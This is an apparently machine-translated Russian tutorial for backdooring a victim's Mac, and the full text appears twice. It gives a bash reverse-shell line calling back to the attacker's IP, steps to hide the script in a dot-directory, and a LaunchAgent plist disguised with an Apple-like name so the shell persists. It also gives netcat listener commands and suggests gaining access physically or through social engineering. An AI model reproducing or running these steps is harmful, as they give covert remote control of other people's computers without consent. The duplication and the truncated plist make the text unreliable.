(ТОЛЬКО ДЛЯ ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЕЙ)
Есть еще один вариант для сохранения бэкдора, который экономит намного больше времени и имеет встроенные функции, и это называется *eggshell* посмотрите, что это отличный инструмент, это скрипт python, сделанный Лукасом Джексоном.
сначала вам нужен физический доступ к mac жертвы, или вы можете реализовать код в .app с некоторой социальной инженерией. Легче с *eggshell*
Начните с создания сценария оболочки под названием «connect.sh»
на маке жертвы в терминале
[SRC]
pico connect.sh
[/SRC]
Теперь это сделано, и просто вставьте его
[SRC]
bash -i >& /dev/tcp/"your_IP_here"/1337 0>&1
wait
[/SRC]
после этого вам нужно сохранить его, сохранив его нажатием на клавиатуре CTRL + O и введите, а затем выйдите из него с помощью CTRL + X
теперь давайте создадим скрытый каталог для сценария оболочки, который вы только что создали
[SRC]
mkdir $HOME/."name" - example:"/.hidden"
cp connect.sh $HOME/."name"/connect.sh
chmod +x $HOME/."name"/connect.sh
[/SRC]
Теперь, когда это будет сделано, давайте создадим LaunchAgent, выполняющий сценарий оболочки каждые 60 секунд для Persistence
создайте текстовый документ и сделайте так, чтобы это был обычный текст, Format>Make Plain Text
не забудьте изменить «USER_NAME» пользователя компьютера, если вы не знаете, какое имя он смотрит справа на терминале, он четко говорит имя без пробелов! например: «mynameisfunny$» и измените «имя», которое вы назвали своей скрытой директорией.
[SRC]
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apples.support</string>
<key>ProgramArguments</key>
<array>
<string>/bin/sh</string>
<string>Users/"USERS_NAME"/."name"/connect.sh</string>
</array>
<key>RunAtLoad</key>
<true/>
[/SRC]
Сохраните его как «com.apples.support.plist» и сохраните его на рабочем столе.
Скопируйте и вставьте «com.apples.support.plist» в /Library/LaunchAgents/
вернитесь к терминалу и введите этот «cd /Library/LaunchAgents/» и введите или вставьте это
[SRC]
launchctl load com.apples.support.plist
[/SRC]
Теперь все!
введите это на свой компьютер, чтобы использовать свой backdoor
[SRC]
linux: nc -l -p 1337
mac: nc -l 1337
windows: nc -l -p 1337
[/SRC]
Есть еще один вариант для сохранения бэкдора, который экономит намного больше времени и имеет встроенные функции, и это называется *eggshell* посмотрите, что это отличный инструмент, это скрипт python, сделанный Лукасом Джексоном.
сначала вам нужен физический доступ к mac жертвы, или вы можете реализовать код в .app с некоторой социальной инженерией. Легче с *eggshell*
Начните с создания сценария оболочки под названием «connect.sh»
на маке жертвы в терминале
[SRC]
pico connect.sh
[/SRC]
Теперь это сделано, и просто вставьте его
[SRC]
bash -i >& /dev/tcp/"your_IP_here"/1337 0>&1
wait
[/SRC]
после этого вам нужно сохранить его, сохранив его нажатием на клавиатуре CTRL + O и введите, а затем выйдите из него с помощью CTRL + X
теперь давайте создадим скрытый каталог для сценария оболочки, который вы только что создали
[SRC]
mkdir $HOME/."name" - example:"/.hidden"
cp connect.sh $HOME/."name"/connect.sh
chmod +x $HOME/."name"/connect.sh
[/SRC]
Теперь, когда это будет сделано, давайте создадим LaunchAgent, выполняющий сценарий оболочки каждые 60 секунд для Persistence
создайте текстовый документ и сделайте так, чтобы это был обычный текст, Format>Make Plain Text
не забудьте изменить «USER_NAME» пользователя компьютера, если вы не знаете, какое имя он смотрит справа на терминале, он четко говорит имя без пробелов! например: «mynameisfunny$» и измените «имя», которое вы назвали своей скрытой директорией.
[SRC]
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apples.support</string>
<key>ProgramArguments</key>
<array>
<string>/bin/sh</string>
<string>Users/"USERS_NAME"/."name"/connect.sh</string>
</array>
<key>RunAtLoad</key>
<true/>
[/SRC]
Сохраните его как «com.apples.support.plist» и сохраните его на рабочем столе.
Скопируйте и вставьте «com.apples.support.plist» в /Library/LaunchAgents/
вернитесь к терминалу и введите этот «cd /Library/LaunchAgents/» и введите или вставьте это
[SRC]
launchctl load com.apples.support.plist
[/SRC]
Теперь все!
введите это на свой компьютер, чтобы использовать свой backdoor
[SRC]
linux: nc -l -p 1337
mac: nc -l 1337
windows: nc -l -p 1337
[/SRC]